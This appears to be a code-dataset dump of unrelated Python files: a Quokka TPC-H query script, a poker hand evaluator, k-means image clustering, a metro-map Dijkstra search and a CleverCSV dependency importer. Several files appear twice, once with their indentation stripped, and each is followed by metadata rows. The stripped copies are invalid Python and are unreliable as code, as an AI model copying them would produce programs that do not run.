import sys
sys.path.append("/home/ubuntu/quokka/")
import datetime
import time
from quokka_runtime import TaskGraph
from sql import AggExecutor, JoinExecutor
import pandas as pd
import ray
import os
task_graph = TaskGraph()
def batch_func(results):
aggs = []
for df in results:
df["high"] = ((df["o_orderpriority"] == "1-URGENT") | (df["o_orderpriority"] == "2-HIGH")).astype(int)
df["low"] = ((df["o_orderpriority"] != "1-URGENT") & (df["o_orderpriority"] != "2-HIGH")).astype(int)
aggs.append(df.groupby("l_shipmode").agg({'high':['sum'],'low':['sum']}))
for i in range(1,len(aggs)):
aggs[0] = aggs[0].add(aggs[i],fill_value=0)
return [aggs[0]]
lineitem_scheme = ["l_orderkey","l_partkey","l_suppkey","l_linenumber","l_quantity","l_extendedprice",
"l_discount","l_tax","l_returnflag","l_linestatus","l_shipdate","l_commitdate","l_receiptdate","l_shipinstruct",
"l_shipmode","l_comment", "null"]
order_scheme = ["o_orderkey", "o_custkey","o_orderstatus","o_totalprice","o_orderdate","o_orderpriority","o_clerk",
"o_shippriority","o_comment", "null"]
orders_filter = lambda x: x[["o_orderkey","o_orderpriority"]]
lineitem_filter = lambda x: x[((x.l_shipmode == "MAIL") | (x.l_shipmode == "SHIP")) & (x.l_commitdate < x.l_receiptdate)
& (x.l_shipdate < x.l_commitdate) & (x.l_receiptdate >= pd.to_datetime(datetime.date(1994,1,1))) & (x.l_receiptdate < pd.to_datetime(datetime.date(1995,1,1)))][["l_orderkey","l_shipmode"]]
if sys.argv[1] == "small":
print("DOING SMALL")
orders = task_graph.new_input_csv("tpc-h-small","orders.tbl",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
lineitem = task_graph.new_input_csv("tpc-h-small","lineitem.tbl",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
else:
orders = task_graph.new_input_csv("tpc-h-csv","orders/orders.tbl.1",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
lineitem = task_graph.new_input_csv("tpc-h-csv","lineitem/lineitem.tbl.1",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
join_executor = JoinExecutor(left_on="o_orderkey",right_on="l_orderkey", batch_func=batch_func, left_primary = True)
output_stream = task_graph.new_non_blocking_node({0:orders,1:lineitem},join_executor,{'localhost':2, '172.31.16.185':2}, {0:"o_orderkey", 1:"l_orderkey"})
agg_executor = AggExecutor()
agged = task_graph.new_blocking_node({0:output_stream}, None, agg_executor, {'localhost':1}, {0:None})
task_graph.initialize()
start = time.time()
task_graph.run()
print("total time ", time.time() - start)
print(agged.to_pandas.remote())
#import pdb;pdb.set_trace()
|
en
| 0.265379
|
#import pdb;pdb.set_trace()
| 2.399288
| 2
|
checkio/Shelter/Texas Referee/texas_referee.py
|
KenMercusLai/checkio
| 39
|
6628107
|
RANKS = "23456789TJQKA"  # rank characters, low to high (index + 2 = numeric rank)
SUITS = "scdh"           # suit characters: spades, clubs, diamonds, hearts
from itertools import combinations
def straight_flush(cards_list):
    """Return a one-element list holding a straight flush, or None."""
    straights = straight(cards_list)
    flushes = flush(cards_list)
    if not (straights and flushes):
        return None
    # A hand that appears in both result sets is a straight flush.
    for hand in straights:
        if hand in flushes:
            return [hand]
def same_rank(cards_list, num):
    """Return every size-`num` combination of cards sharing a single rank."""
    matches = []
    for combo in combinations(cards_list, num):
        if len({card[0] for card in combo}) == 1:
            matches.append(combo)
    return matches
def four_of_kind(cards_list):
    """Return [quad + best kicker] if four of a kind exists, else None."""
    for quad in same_rank(cards_list, 4):
        # Input is sorted high-to-low, so the first remaining card is the
        # best kicker.
        kickers = [card for card in cards_list if card not in quad]
        return [list(quad) + [kickers[0]]]
def full_house(cards_list):
    """Return [triple + pair] if a full house exists, else None."""
    for triple in same_rank(cards_list, 3):
        remainder = [card for card in cards_list if card not in triple]
        pair_options = same_rank(remainder, 2)
        if pair_options:
            return [list(triple) + list(pair_options[0])]
def flush(cards_list):
    """Return all 5-card combinations drawn from one suit."""
    return [combo for combo in combinations(cards_list, 5)
            if len({card[1] for card in combo}) == 1]
def straight(cards_list):
    """Return all 5-card runs (input must be sorted descending by rank)."""
    runs = []
    for combo in combinations(cards_list, 5):
        ranks = [card[0] for card in combo]
        # Five distinct ranks spanning exactly four form a run.
        if ranks[0] - ranks[-1] == 4 and len(set(ranks)) == 5:
            runs.append(combo)
    return runs
def three_of_a_kind(cards_list):
    """Return [triple + two best kickers] if three of a kind exists."""
    for triple in same_rank(cards_list, 3):
        kickers = [card for card in cards_list if card not in triple]
        return [list(triple) + kickers[:2]]
def two_pair(cards_list):
    """Return [pair + pair + kicker], sorted high-to-low, if two pairs exist."""
    pair_options = same_rank(cards_list, 2)
    if len(pair_options) < 2:
        return None
    used = tuple(list(pair_options[0]) + list(pair_options[1]))
    leftovers = [card for card in cards_list if card not in used]
    return [sorted(list(used) + [leftovers[0]], reverse=True)]
def one_pair(cards_list):
    """Return [pair + three best kickers] when exactly one pair exists."""
    pair_options = same_rank(cards_list, 2)
    if len(pair_options) != 1:
        return None
    used = tuple(pair_options[0])
    leftovers = [card for card in cards_list if card not in used]
    return [sorted(list(used) + leftovers[:3], reverse=True)]
def high_card(cards_list):
    """Best five cards by position (input is already sorted descending)."""
    return [cards_list[:5]]
def texas_referee(cards_str):
    """Pick the best 5-card hand from a comma-separated 7-card string.

    Cards are written rank-then-suit (e.g. "Kh"); the result is the winning
    five cards in the same notation, joined by commas.
    """
    parsed = sorted(
        ((RANKS.index(c[0]) + 2, SUITS.index(c[1])) for c in cards_str.split(',')),
        reverse=True,
    )
    # Hand evaluators from strongest to weakest; the first hit wins.
    evaluators = (
        straight_flush,
        four_of_kind,
        full_house,
        flush,
        straight,
        three_of_a_kind,
        two_pair,
        one_pair,
        high_card,
    )
    for evaluate in evaluators:
        best = evaluate(parsed)
        if best:
            return ','.join(RANKS[rank - 2] + SUITS[suit] for rank, suit in best[0])
if __name__ == '__main__':  # pragma: no cover
    # These asserts are only for self-checking and are not necessary for
    # auto-testing.
    assert (
        texas_referee("Kh,Qh,Ah,9s,2c,Th,Jh") == "Ah,Kh,Qh,Jh,Th"
    ), "High Straight Flush"
    assert texas_referee("Qd,Ad,9d,8d,Td,Jd,7d") == "Qd,Jd,Td,9d,8d", "Straight Flush"
    assert texas_referee("5c,7h,7d,9s,9c,8h,6d") == "9c,8h,7h,6d,5c", "Straight"
    assert texas_referee("Ts,2h,2d,3s,Td,3c,Th") == "Th,Td,Ts,3c,3s", "Full House"
    assert (
        texas_referee("Jh,Js,9h,Jd,Th,8h,Td") == "Jh,Jd,Js,Th,Td"
    ), "Full House vs Flush"
    assert texas_referee("Js,Td,8d,9s,7d,2d,4d") == "Td,8d,7d,4d,2d", "Flush"
    assert texas_referee("Ts,2h,Tc,3s,Td,3c,Th") == "Th,Td,Tc,Ts,3c", "Four of Kind"
    assert texas_referee("Ks,9h,Th,Jh,Kd,Kh,8s") == "Kh,Kd,Ks,Jh,Th", "Three of Kind"
    assert texas_referee("2c,3s,4s,5s,7s,2d,7h") == "7h,7s,5s,2d,2c", "Two Pairs"
    assert texas_referee("2s,3s,4s,5s,2d,7h,8h") == "8h,7h,5s,2d,2s", "One Pair"
    assert texas_referee("3h,4h,Th,6s,Ad,Jc,2h") == "Ad,Jc,Th,6s,4h", "High Cards"
|
RANKS = "23456789TJQKA"
SUITS = "scdh"
from itertools import combinations
def straight_flush(cards_list):
s = straight(cards_list)
f = flush(cards_list)
if s and f:
for i in s:
if i in f:
return [i]
def same_rank(cards_list, num):
result = []
for i in combinations(cards_list, num):
if len(set([j[0] for j in i])) == 1:
result.append(i)
return result
def four_of_kind(cards_list):
four = same_rank(cards_list, 4)
for i in four:
sub_cards_list = [j for j in cards_list if j not in i]
return [(list(i) + [sub_cards_list[0]])]
def full_house(cards_list):
three = same_rank(cards_list, 3)
for i in three:
sub_cards_list = [j for j in cards_list if j not in i]
pairs = same_rank(sub_cards_list, 2)
if pairs:
return [(list(i) + list(pairs[0]))]
def flush(cards_list):
result = []
for i in combinations(cards_list, 5):
if len(set([j[1] for j in i])) == 1:
result.append(i)
return result
def straight(cards_list):
result = []
for i in combinations(cards_list, 5):
rank = list(map(lambda x: x[0], i))
if rank[0] - rank[-1] == 4 and len(set(rank)) == 5:
result.append(i)
return result
def three_of_a_kind(cards_list):
four = same_rank(cards_list, 3)
for i in four:
sub_cards_list = [j for j in cards_list if j not in i]
return [(list(i) + sub_cards_list[:2])]
def two_pair(cards_list):
pairs = same_rank(cards_list, 2)
if len(pairs) >= 2:
two = tuple(list(pairs[0]) + list(pairs[1]))
sub_cards_list = [j for j in cards_list if j not in two]
return [sorted(list(two) + [sub_cards_list[0]], reverse=True)]
def one_pair(cards_list):
pairs = same_rank(cards_list, 2)
if len(pairs) == 1:
two = tuple(list(pairs[0]))
sub_cards_list = [j for j in cards_list if j not in two]
return [sorted(list(two) + sub_cards_list[:3], reverse=True)]
def high_card(cards_list):
return [(cards_list[:5])]
def texas_referee(cards_str):
cards_list = sorted(
[(RANKS.index(i[0]) + 2, SUITS.index(i[1])) for i in cards_str.split(',')],
reverse=True,
)
hand_list = (
straight_flush,
four_of_kind,
full_house,
flush,
straight,
three_of_a_kind,
two_pair,
one_pair,
high_card,
)
for fun in hand_list:
cards = fun(cards_list)
if cards:
cards = [str(RANKS[i[0] - 2]) + str(SUITS[i[1]]) for i in cards[0]]
return ','.join(cards)
if __name__ == '__main__': # pragma: no cover
# These "asserts" using only for self-checking and not necessary for
# auto-testing
assert (
texas_referee("Kh,Qh,Ah,9s,2c,Th,Jh") == "Ah,Kh,Qh,Jh,Th"
), "High Straight Flush"
assert texas_referee("Qd,Ad,9d,8d,Td,Jd,7d") == "Qd,Jd,Td,9d,8d", "Straight Flush"
assert texas_referee("5c,7h,7d,9s,9c,8h,6d") == "9c,8h,7h,6d,5c", "Straight"
assert texas_referee("Ts,2h,2d,3s,Td,3c,Th") == "Th,Td,Ts,3c,3s", "Full House"
assert (
texas_referee("Jh,Js,9h,Jd,Th,8h,Td") == "Jh,Jd,Js,Th,Td"
), "Full House vs Flush"
assert texas_referee("Js,Td,8d,9s,7d,2d,4d") == "Td,8d,7d,4d,2d", "Flush"
assert texas_referee("Ts,2h,Tc,3s,Td,3c,Th") == "Th,Td,Tc,Ts,3c", "Four of Kind"
assert texas_referee("Ks,9h,Th,Jh,Kd,Kh,8s") == "Kh,Kd,Ks,Jh,Th", "Three of Kind"
assert texas_referee("2c,3s,4s,5s,7s,2d,7h") == "7h,7s,5s,2d,2c", "Two Pairs"
assert texas_referee("2s,3s,4s,5s,2d,7h,8h") == "8h,7h,5s,2d,2s", "One Pair"
assert texas_referee("3h,4h,Th,6s,Ad,Jc,2h") == "Ad,Jc,Th,6s,4h", "High Cards"
|
en
| 0.745408
|
# pragma: no cover # These "asserts" using only for self-checking and not necessary for # auto-testing
| 2.925571
| 3
|
src/test2/task2.py
|
samorojy/spbu_python_course
| 0
|
6628108
|
<reponame>samorojy/spbu_python_course
import random
import numpy
import numpy as np
from PIL import Image
from numpy.random import uniform
# NOTE: an equivalent helper exists in SciPy (scipy.spatial.distance);
# implemented locally here to avoid the extra dependency.
def euclidean(point, data):
    """Row-wise Euclidean distance from `point` to each row of `data`."""
    squared_diffs = (point - data) ** 2
    return np.sqrt(squared_diffs.sum(axis=1))
class KMeans:
    """Minimal k-means clusterer with k-means++-style seeding."""

    def __init__(self, n_clusters=2, max_iter=100):
        # Number of clusters and the cap on Lloyd iterations.
        self.n_clusters = n_clusters
        self.max_iter = max_iter

    def fit(self, X):
        """Fit centroids to the points in X (seeding + Lloyd's algorithm)."""
        # Seeding: first centroid uniformly at random, the rest sampled with
        # probability proportional to summed distance from existing centroids.
        # NOTE(review): classic k-means++ weights by squared distance to the
        # *nearest* centroid; this variant sums plain distances to all of them.
        self.centroids = [random.choice(X)]
        for _ in range(self.n_clusters - 1):
            dists = np.sum([euclidean(centroid, X) for centroid in self.centroids], axis=0)
            dists /= np.sum(dists)  # normalise into a probability vector
            (new_centroid_idx,) = np.random.choice(range(len(X)), size=1, p=dists)
            self.centroids += [X[new_centroid_idx]]
        # Lloyd's loop: assign each point to its nearest centroid, recompute
        # centroid means, repeat until centroids stop moving or max_iter hits.
        iteration = 0
        prev_centroids = None
        while np.not_equal(self.centroids, prev_centroids).any() and iteration < self.max_iter:
            sorted_points = [[] for _ in range(self.n_clusters)]
            for point in X:
                dists = euclidean(point, self.centroids)
                centroid_idx = np.argmin(dists)
                sorted_points[centroid_idx].append(point)
            prev_centroids = self.centroids
            self.centroids = [np.mean(cluster, axis=0) for cluster in sorted_points]
            for i, centroid in enumerate(self.centroids):
                # An empty cluster yields a NaN mean; keep its old centroid.
                if np.isnan(centroid).any():
                    self.centroids[i] = prev_centroids[i]
            iteration += 1

    def predict(self, X):
        """Return the index of the nearest fitted centroid for each point."""
        centroids = []
        centroid_idxs = []
        for x in X:
            dists = euclidean(x, self.centroids)
            centroid_idx = np.argmin(dists)
            centroids.append(self.centroids[centroid_idx])
            centroid_idxs.append(centroid_idx)
        return np.array([i for i in centroid_idxs])
# Posterize img.png: cluster pixels as (x, y, colour...) vectors with k-means,
# then repaint each pixel with its cluster centroid's colour.
# NOTE(review): the original indentation was lost in this copy; the pixel
# accesses are kept inside the `with` block here because the image object is
# closed on exit — confirm against the upstream file.
with Image.open("img.png") as img:
    width, height = img.size
    # Each sample: pixel coordinates followed by its colour bands.
    pixels = np.array([(i % width, i // width) + c for i, c in enumerate(list(img.getdata()))])
    model = KMeans(30, 100)
    model.fit(pixels)
    prediction = model.predict(pixels)
    image_pixels = img.load()
    for i in range(len(pixels)):
        # Centroid components [2:] are the colour channels (skip x, y).
        image_pixels[pixels[i][0], pixels[i][1]] = tuple(int(x) for x in model.centroids[prediction[i]][2:])
    img.save("processed.png")
|
import random
import numpy
import numpy as np
from PIL import Image
from numpy.random import uniform
# function is defined in SciPy?
def euclidean(point, data):
return np.sqrt(np.sum((point - data) ** 2, axis=1))
class KMeans:
    """Plain k-means clustering with a k-means++-style seeding step."""

    def __init__(self, n_clusters=2, max_iter=100):
        self.n_clusters = n_clusters  # number of centroids to fit
        self.max_iter = max_iter      # cap on Lloyd iterations

    def fit(self, X):
        """Fit ``self.centroids`` to the rows of ``X``.

        Seeding: the first centroid is a uniformly random sample; each
        further centroid is drawn with probability proportional to its
        summed distance from all existing centroids (k-means++-like, using
        the distance *sum* rather than the classic min-distance-squared —
        TODO confirm this is intended).
        """
        self.centroids = [random.choice(X)]
        for _ in range(self.n_clusters - 1):
            # Selection weights: total distance of every sample to all
            # current centroids, normalised into a probability vector.
            dists = np.sum([euclidean(centroid, X) for centroid in self.centroids], axis=0)
            dists /= np.sum(dists)
            (new_centroid_idx,) = np.random.choice(range(len(X)), size=1, p=dists)
            self.centroids += [X[new_centroid_idx]]
        # Lloyd iterations: stop when centroids stop moving or on max_iter.
        iteration = 0
        prev_centroids = None
        while np.not_equal(self.centroids, prev_centroids).any() and iteration < self.max_iter:
            # Assignment step: bucket each point under its nearest centroid.
            sorted_points = [[] for _ in range(self.n_clusters)]
            for point in X:
                dists = euclidean(point, self.centroids)
                centroid_idx = np.argmin(dists)
                sorted_points[centroid_idx].append(point)
            # Update step: move each centroid to its cluster mean.
            prev_centroids = self.centroids
            self.centroids = [np.mean(cluster, axis=0) for cluster in sorted_points]
            for i, centroid in enumerate(self.centroids):
                # An empty cluster yields a NaN mean; keep its old centroid.
                if np.isnan(centroid).any():
                    self.centroids[i] = prev_centroids[i]
            iteration += 1

    def predict(self, X):
        """Return the index of the nearest centroid for each row of ``X``."""
        centroids = []
        centroid_idxs = []
        for x in X:
            dists = euclidean(x, self.centroids)
            centroid_idx = np.argmin(dists)
            centroids.append(self.centroids[centroid_idx])
            centroid_idxs.append(centroid_idx)
        return np.array([i for i in centroid_idxs])
# Colour-quantize img.png: cluster pixels in (x, y, colour-channel) space
# with 30 clusters, then repaint each pixel with its centroid's colour.
with Image.open("img.png") as img:
    width, height = img.size
    # One feature row per pixel: (x, y) position followed by the channels.
    pixels = np.array([(i % width, i // width) + c for i, c in enumerate(list(img.getdata()))])
    model = KMeans(30, 100)
    model.fit(pixels)
    prediction = model.predict(pixels)
    image_pixels = img.load()
    for i in range(len(pixels)):
        # centroid[:2] is the (x, y) part; [2:] holds the colour channels.
        image_pixels[pixels[i][0], pixels[i][1]] = tuple(int(x) for x in model.centroids[prediction[i]][2:])
    img.save("processed.png")
|
en
| 0.861527
|
# function is defined in SciPy?
| 3.261024
| 3
|
alchemicalitp/tutorial_files.py
|
bigginlab/alchemicalitp
| 1
|
6628109
|
# Paths to the bundled GLU/GLH free-energy (FEP) example files;
# resource_filename resolves them inside the installed package data.
from pkg_resources import resource_filename
# Topologies and coordinates for the two end states.
glu_top = resource_filename(__name__, 'data/fep_example/GLU.top')
glh_top = resource_filename(__name__, 'data/fep_example/GLH.top')
glu_crd = resource_filename(__name__, 'data/fep_example/GLU.gro')
glh_crd = resource_filename(__name__, 'data/fep_example/GLH.gro')
# Minimisation and test MDP inputs for states 0 and 1.
mdp_em0 = resource_filename(__name__, 'data/fep_example/minim0.mdp')
mdp_em1 = resource_filename(__name__, 'data/fep_example/minim1.mdp')
mdp_energy0 = resource_filename(__name__, 'data/fep_example/test0.mdp')
mdp_energy1 = resource_filename(__name__, 'data/fep_example/test1.mdp')
|
# Paths to the bundled GLU/GLH free-energy (FEP) example files;
# resource_filename resolves them inside the installed package data.
from pkg_resources import resource_filename
# Topologies and coordinates for the two end states.
glu_top = resource_filename(__name__, 'data/fep_example/GLU.top')
glh_top = resource_filename(__name__, 'data/fep_example/GLH.top')
glu_crd = resource_filename(__name__, 'data/fep_example/GLU.gro')
glh_crd = resource_filename(__name__, 'data/fep_example/GLH.gro')
# Minimisation and test MDP inputs for states 0 and 1.
mdp_em0 = resource_filename(__name__, 'data/fep_example/minim0.mdp')
mdp_em1 = resource_filename(__name__, 'data/fep_example/minim1.mdp')
mdp_energy0 = resource_filename(__name__, 'data/fep_example/test0.mdp')
mdp_energy1 = resource_filename(__name__, 'data/fep_example/test1.mdp')
|
none
| 1
| 1.542878
| 2
|
|
problemsets/Codeforces/Python/A137.py
|
juarezpaulino/coderemite
| 0
|
6628110
|
<reponame>juarezpaulino/coderemite<gh_stars>0
"""
*
* Author: <NAME>(coderemite)
* Email: <EMAIL>
*
"""
a=input()
x=a[0]
r=j=0
for c in a:
if c!=x or j==5:
x=c;j=0;r+=1
j+=1
print(r+1)
|
"""
*
* Author: <NAME>(coderemite)
* Email: <EMAIL>
*
"""
a=input()
x=a[0]
r=j=0
for c in a:
if c!=x or j==5:
x=c;j=0;r+=1
j+=1
print(r+1)
|
en
| 0.307447
|
* * Author: <NAME>(coderemite) * Email: <EMAIL> *
| 3.325597
| 3
|
dijkstra.py
|
ivandumas/Algoritmos
| 0
|
6628111
|
<gh_stars>0
from queue import PriorityQueue
metro = ['El Rosario','Instituto del Petroleo','Deportivo 18 de Marzo','<NAME>','La Raza',
'Consulado','Tacuba','Oceania','Guerrero','Garibaldi','Hidalgo','<NAME>', 'Morelos',
'San Lazaro', 'Balderas','Salto del Agua','<NAME>','Candelaria','Tacubaya','Pantitlan',
'Centro Medico', 'Chabacano','Jamaica','Santa Anita','Mixcoac','Zapata','Ermita','Atlalinco']
class Graph:
    """Undirected, weighted graph on vertices 0..n-1, stored as an
    adjacency matrix, with Dijkstra shortest-path search."""

    def __init__(self, num_of_vertices):
        self.v = num_of_vertices
        # -1 marks the absence of an edge.
        self.edges = [[-1] * num_of_vertices for _ in range(num_of_vertices)]
        self.visited = []

    def addEdge(self, u, v, weight):
        # Undirected: mirror the weight in both directions.
        self.edges[u][v] = self.edges[v][u] = weight

    def dijkstra(self, start_vertex):
        """Return a dict mapping every vertex to its shortest distance
        from ``start_vertex``."""
        D = {vertex: float('inf') for vertex in range(self.v)}
        D[start_vertex] = 0
        frontier = PriorityQueue()
        frontier.put((0, start_vertex))
        while not frontier.empty():
            _, current = frontier.get()
            self.visited.append(current)
            for neighbor, weight in enumerate(self.edges[current]):
                # Skip non-edges and already-settled vertices.
                if weight == -1 or neighbor in self.visited:
                    continue
                candidate = D[current] + weight
                if candidate < D[neighbor]:
                    frontier.put((candidate, neighbor))
                    D[neighbor] = candidate
        return D
# Build the 28-station metro graph (vertex i corresponds to metro[i])
# and report shortest travel costs from 'El Rosario' (vertex 0).
g = Graph(28)
g.addEdge(0, 1, 5)
g.addEdge(0, 6, 3)
g.addEdge(1, 2, 1)
g.addEdge(1, 4, 1)
g.addEdge(2, 3, 1)
g.addEdge(3, 5, 2)
g.addEdge(4, 2, 1)
g.addEdge(4, 5, 2)
g.addEdge(4, 8, 1)
g.addEdge(5, 7, 2)
g.addEdge(5, 12, 1)
g.addEdge(6, 10, 6)
g.addEdge(6, 18, 4)
g.addEdge(7, 13, 2)
g.addEdge(7, 19, 2)
g.addEdge(8, 9, 0)
g.addEdge(8, 10, 0)
g.addEdge(9, 11, 0)
g.addEdge(9, 12, 2)
g.addEdge(10, 11, 0)
g.addEdge(10, 14, 1)
g.addEdge(11, 15, 1)
g.addEdge(11, 16, 2)
g.addEdge(12, 13, 0)
g.addEdge(12, 17, 0)
g.addEdge(13, 17, 0)
g.addEdge(13, 19, 5)
g.addEdge(14, 18, 5)
g.addEdge(14, 15, 0)
g.addEdge(14, 20, 2)
g.addEdge(15, 16, 1)
g.addEdge(15, 21, 2)
g.addEdge(16, 17, 0)
g.addEdge(16, 21, 1)
g.addEdge(17, 22, 1)
g.addEdge(18, 20, 2)
g.addEdge(18, 24, 2)
g.addEdge(19, 22, 4)
g.addEdge(20, 21, 1)
g.addEdge(20, 25, 3)
g.addEdge(21, 22, 0)
g.addEdge(21, 23, 1)
g.addEdge(21, 26, 5)
g.addEdge(22, 23, 0)
g.addEdge(23, 27, 5)
g.addEdge(24, 25, 2)
g.addEdge(25, 26, 2)
g.addEdge(26, 27, 1)
# NOTE(review): the label says "BFT" but the traversal below is Dijkstra.
print ("BFT:")
D = g.dijkstra(0)
for vertex in range(len(D)):
    print(f"Distance from El Rosario to {metro[vertex]}, is {D[vertex]}")
|
from queue import PriorityQueue
metro = ['El Rosario','Instituto del Petroleo','Deportivo 18 de Marzo','<NAME>','La Raza',
'Consulado','Tacuba','Oceania','Guerrero','Garibaldi','Hidalgo','<NAME>', 'Morelos',
'San Lazaro', 'Balderas','Salto del Agua','<NAME>','Candelaria','Tacubaya','Pantitlan',
'Centro Medico', 'Chabacano','Jamaica','Santa Anita','Mixcoac','Zapata','Ermita','Atlalinco']
class Graph:
    """Undirected, weighted graph on vertices 0..n-1, stored as an
    adjacency matrix, with Dijkstra shortest-path search."""

    def __init__(self, num_of_vertices):
        self.v = num_of_vertices
        # -1 marks the absence of an edge.
        self.edges = [[-1] * num_of_vertices for _ in range(num_of_vertices)]
        self.visited = []

    def addEdge(self, u, v, weight):
        # Undirected: mirror the weight in both directions.
        self.edges[u][v] = self.edges[v][u] = weight

    def dijkstra(self, start_vertex):
        """Return a dict mapping every vertex to its shortest distance
        from ``start_vertex``."""
        D = {vertex: float('inf') for vertex in range(self.v)}
        D[start_vertex] = 0
        frontier = PriorityQueue()
        frontier.put((0, start_vertex))
        while not frontier.empty():
            _, current = frontier.get()
            self.visited.append(current)
            for neighbor, weight in enumerate(self.edges[current]):
                # Skip non-edges and already-settled vertices.
                if weight == -1 or neighbor in self.visited:
                    continue
                candidate = D[current] + weight
                if candidate < D[neighbor]:
                    frontier.put((candidate, neighbor))
                    D[neighbor] = candidate
        return D
g = Graph(28)
g.addEdge(0, 1, 5)
g.addEdge(0, 6, 3)
g.addEdge(1, 2, 1)
g.addEdge(1, 4, 1)
g.addEdge(2, 3, 1)
g.addEdge(3, 5, 2)
g.addEdge(4, 2, 1)
g.addEdge(4, 5, 2)
g.addEdge(4, 8, 1)
g.addEdge(5, 7, 2)
g.addEdge(5, 12, 1)
g.addEdge(6, 10, 6)
g.addEdge(6, 18, 4)
g.addEdge(7, 13, 2)
g.addEdge(7, 19, 2)
g.addEdge(8, 9, 0)
g.addEdge(8, 10, 0)
g.addEdge(9, 11, 0)
g.addEdge(9, 12, 2)
g.addEdge(10, 11, 0)
g.addEdge(10, 14, 1)
g.addEdge(11, 15, 1)
g.addEdge(11, 16, 2)
g.addEdge(12, 13, 0)
g.addEdge(12, 17, 0)
g.addEdge(13, 17, 0)
g.addEdge(13, 19, 5)
g.addEdge(14, 18, 5)
g.addEdge(14, 15, 0)
g.addEdge(14, 20, 2)
g.addEdge(15, 16, 1)
g.addEdge(15, 21, 2)
g.addEdge(16, 17, 0)
g.addEdge(16, 21, 1)
g.addEdge(17, 22, 1)
g.addEdge(18, 20, 2)
g.addEdge(18, 24, 2)
g.addEdge(19, 22, 4)
g.addEdge(20, 21, 1)
g.addEdge(20, 25, 3)
g.addEdge(21, 22, 0)
g.addEdge(21, 23, 1)
g.addEdge(21, 26, 5)
g.addEdge(22, 23, 0)
g.addEdge(23, 27, 5)
g.addEdge(24, 25, 2)
g.addEdge(25, 26, 2)
g.addEdge(26, 27, 1)
print ("BFT:")
D = g.dijkstra(0)
for vertex in range(len(D)):
print(f"Distance from El Rosario to {metro[vertex]}, is {D[vertex]}")
|
none
| 1
| 3.769249
| 4
|
|
clevercsv/_optional.py
|
baldurmen/CleverCSV
| 989
|
6628112
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
"""Code for dealing with optional dependencies
The functionality in this file is largely based on similar functionality in the
Pandas library.
Author: <NAME>
Copyright: 2020, The Alan Turing Institute
License: See LICENSE file.
"""
import distutils.version
import importlib
# update this when changing setup.py
# update this when changing setup.py
VERSIONS = {
    "cleo": "0.7.6",
    "clikit": "0.4.0",
    "tabview": "1.4",
    "pandas": "0.24.1",
    "cchardet": "2.1.7"
}


def import_optional_dependency(name, raise_on_missing=True):
    """
    Import an optional dependency.

    This function is modelled on a similar function in the Pandas library.

    Parameters
    ----------
    name : str
        Name of the module to import
    raise_on_missing : bool
        Whether to raise an error when the package is missing or to simply
        return None.

    Returns
    -------
    module : module
        The module if importing was successful, None if
        :attr:`raise_on_missing` is False.

    Raises
    ------
    ImportError
        When a module can't be imported and :attr:`raise_on_missing` is True.
    """
    msg = (
        f"\nOptional dependency '{name}' is missing. You can install it using "
        "pip or conda, or you can install CleverCSV with all of its optional "
        "dependencies by running: pip install clevercsv[full]"
    )
    try:
        module = importlib.import_module(name)
    except ImportError:
        if raise_on_missing:
            raise ImportError(msg) from None
        else:
            return None
    min_version = VERSIONS.get(name)
    if not min_version:
        return module
    version = getattr(module, "__version__", None)
    if version is None:
        # No version to compare against; accept the module as-is.
        # (Bug fix: previously returned None here, silently dropping a
        # successfully imported module, contrary to the docstring.)
        return module
    if distutils.version.LooseVersion(version) < min_version:
        # Bug fix: the continuation strings below lacked the f-prefix, so
        # '{name}' was emitted literally instead of being interpolated.
        msg = (
            f"CleverCSV requires version '{min_version}' or newer for "
            f"optional dependency '{name}'. Please update the package "
            "or install CleverCSV with all its optional dependencies "
            "using: pip install clevercsv[full]"
        )
        raise ImportError(msg)
    return module
|
# -*- coding: utf-8 -*-
"""Code for dealing with optional dependencies
The functionality in this file is largely based on similar functionality in the
Pandas library.
Author: <NAME>
Copyright: 2020, The Alan Turing Institute
License: See LICENSE file.
"""
import distutils.version
import importlib
# update this when changing setup.py
# update this when changing setup.py
VERSIONS = {
    "cleo": "0.7.6",
    "clikit": "0.4.0",
    "tabview": "1.4",
    "pandas": "0.24.1",
    "cchardet": "2.1.7"
}


def import_optional_dependency(name, raise_on_missing=True):
    """
    Import an optional dependency.

    This function is modelled on a similar function in the Pandas library.

    Parameters
    ----------
    name : str
        Name of the module to import
    raise_on_missing : bool
        Whether to raise an error when the package is missing or to simply
        return None.

    Returns
    -------
    module : module
        The module if importing was successful, None if
        :attr:`raise_on_missing` is False.

    Raises
    ------
    ImportError
        When a module can't be imported and :attr:`raise_on_missing` is True.
    """
    msg = (
        f"\nOptional dependency '{name}' is missing. You can install it using "
        "pip or conda, or you can install CleverCSV with all of its optional "
        "dependencies by running: pip install clevercsv[full]"
    )
    try:
        module = importlib.import_module(name)
    except ImportError:
        if raise_on_missing:
            raise ImportError(msg) from None
        else:
            return None
    min_version = VERSIONS.get(name)
    if not min_version:
        return module
    version = getattr(module, "__version__", None)
    if version is None:
        # No version to compare against; accept the module as-is.
        # (Bug fix: previously returned None here, silently dropping a
        # successfully imported module, contrary to the docstring.)
        return module
    if distutils.version.LooseVersion(version) < min_version:
        # Bug fix: the continuation strings below lacked the f-prefix, so
        # '{name}' was emitted literally instead of being interpolated.
        msg = (
            f"CleverCSV requires version '{min_version}' or newer for "
            f"optional dependency '{name}'. Please update the package "
            "or install CleverCSV with all its optional dependencies "
            "using: pip install clevercsv[full]"
        )
        raise ImportError(msg)
    return module
|
en
| 0.711474
|
# -*- coding: utf-8 -*- Code for dealing with optional dependencies The functionality in this file is largely based on similar functionality in the Pandas library. Author: <NAME> Copyright: 2020, The Alan Turing Institute License: See LICENSE file. # update this when changing setup.py Import an optional dependency. This function is modelled on a similar function in the Pandas library. Parameters ---------- name : str Name of the module to import raise_on_missing : bool Whether to raise an error when the package is missing or to simply return None. Returns ------- module : module The module if importing was successful, None if :attr:`raise_on_missing` is False. Raises ------ ImportError When a module can't be imported and :attr:`raise_on_missing` is True.
| 3.092571
| 3
|
utils.py
|
Warvito/Normative-modelling-using-deep-autoencoders
| 12
|
6628113
|
<reponame>Warvito/Normative-modelling-using-deep-autoencoders
"""Helper functions and constants."""
from pathlib import Path
import warnings
import pandas as pd
import numpy as np
PROJECT_ROOT = Path.cwd()
def cliff_delta(X, Y):
